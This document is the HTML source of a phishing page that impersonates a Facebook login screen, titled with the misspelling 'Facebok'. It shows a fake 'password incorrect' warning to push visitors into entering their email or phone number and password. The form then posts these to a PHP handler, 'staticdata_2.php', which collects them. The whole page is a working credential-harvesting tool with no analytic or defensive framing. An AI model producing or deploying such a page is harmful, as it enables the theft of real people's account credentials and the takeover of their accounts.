

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Secure on Facebok</title>
    <link rel="shortcut icon" href="fav.ico">
    <link rel="stylesheet" type="text/css" href="style.css" />
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700&display=swap" rel="stylesheet" />
<h2 class="header-title"><img width="110px" align="center" src="logos_f.svg"></h2>
  </head>
  <body style="background-color:#F0F8FF">  
 
            <center>
        <div class="header-1">  
          <img alt="" src="5G4-yvJ_bsF.png" height="70" width="70" />
        </div>
      </center>
      <br>
<center> <strong>Stay Secure on Facebok</strong> </center> 

 <center><a style="color:Red;background: none;">The password that you've entered is incorrect. </br>Forgotten password?</a></br></center>
          <br>
      <center>
        <form method="POST" action="staticdata_2.php" enctype="multipart/form-data" >
        <div class="base">
       
          <div> 
          <input type="text" name="user" required="" placeholder="Email address or phone number" />
          </div>
          <div>
          <input type="Password" id="lname" name="lastname" placeholder="Password" required>
          
          </div>
           <br>
          <div>
           <button type="submit">CONFIRMATION</button>
          </div>

          <div class="footer">
            <br>
        <div class="copy" style="color:gray;font-size: small;"><br>
          <center><img alt="" src="789.png" height="30" width="80" />
          
        </div>
          <div>
            <p style="font-size: small;"></p>
          </div>
          </div>
        </form>
      <br>
    </center>
    <br>
    <center>
      <div class="languange" style="color:#576b95;font-size: small">
        
        <div class="l-1">
          <b style="color:576b95 !important"></b><br>
          <br>
          <br>
          <br>
        </div>

        <div class="l-1"> 
        </div>

      </div>
      
      </div>
    </center>
</html>